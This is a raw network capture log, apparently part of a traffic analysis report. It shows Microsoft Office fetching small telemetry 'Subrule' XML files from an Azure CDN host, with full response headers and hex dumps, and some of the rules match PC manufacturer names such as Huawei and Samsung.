                                                  2024-12-09 08:35:34 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  57192.168.2.44982413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:35 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:35 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 468
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                  ETag: "0x8DC582B9C8E04C8"
                                                  x-ms-request-id: e9e1dff1-101e-0065-7303-484088000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083535Z-r1cf579d778qgtz2hC1EWRmgks00000007ng000000004fng
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:35 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  58192.168.2.44982513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:35 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:36 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 428
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                  ETag: "0x8DC582BAC4F34CA"
                                                  x-ms-request-id: 8ac5c401-401e-002a-771e-49c62e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083536Z-r1cf579d7782w22mhC1EWR2ebg00000002t00000000039g1
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:36 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  59192.168.2.44982613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:35 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:36 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 499
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                  ETag: "0x8DC582B98CEC9F6"
                                                  x-ms-request-id: b10a885e-c01e-00a1-42cd-497e4a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083536Z-r1cf579d7782v2q5hC1EWRt9bw00000002fg000000005wut
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:36 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  60192.168.2.44982713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:36 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:36 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B988EBD12"
                                                  x-ms-request-id: 09188c3a-a01e-0021-2702-48814c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083536Z-r1cf579d778z4wflhC1EWRa3h000000007yg000000001p8u
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:36 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  61192.168.2.44982813.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:36 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:36 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 471
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                  ETag: "0x8DC582BB5815C4C"
                                                  x-ms-request-id: d550787b-001e-0049-4b89-495bd5000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083536Z-r1cf579d778dndrdhC1EWR4b2400000007e0000000004r6w
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:36 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  62192.168.2.44982913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:37 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:37 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:37 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                  ETag: "0x8DC582BB32BB5CB"
                                                  x-ms-request-id: fe216484-501e-008f-70b4-499054000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083537Z-r1cf579d7788c742hC1EWRr97n0000000220000000002zux
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:37 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  63192.168.2.44983013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:38 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:38 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:38 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 494
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                  ETag: "0x8DC582BB8972972"
                                                  x-ms-request-id: a17cc0cf-001e-0079-79ae-4912e8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083538Z-r1cf579d778mpnwnhC1EWRfgng00000001kg0000000046r9
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:38 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  64192.168.2.44983113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:38 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:38 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:38 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 420
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                  ETag: "0x8DC582B9DAE3EC0"
                                                  x-ms-request-id: d2d76441-101e-0065-2c82-494088000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083538Z-r1cf579d7789jf56hC1EWRu58800000002yg000000003z0v
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:38 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  65192.168.2.44983213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:38 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:38 UTC491INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:38 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                  ETag: "0x8DC582B9D43097E"
                                                  x-ms-request-id: 4c33d105-301e-003f-6b44-49266f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083538Z-r1cf579d778l2x6lhC1EWRsptc00000000rg00000000538z
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:38 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  66192.168.2.44983313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:38 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:38 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:38 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 427
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                  ETag: "0x8DC582BA909FA21"
                                                  x-ms-request-id: a32a4087-901e-0083-2b4e-49bb55000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083538Z-r1cf579d7782w22mhC1EWR2ebg00000002qg000000005h23
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:38 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  67192.168.2.44983413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:39 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:39 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:39 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 486
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                  ETag: "0x8DC582B92FCB436"
                                                  x-ms-request-id: 549300b5-601e-000d-6903-482618000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083539Z-r1cf579d7789trgthC1EWRkkfc00000008hg0000000032wf
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
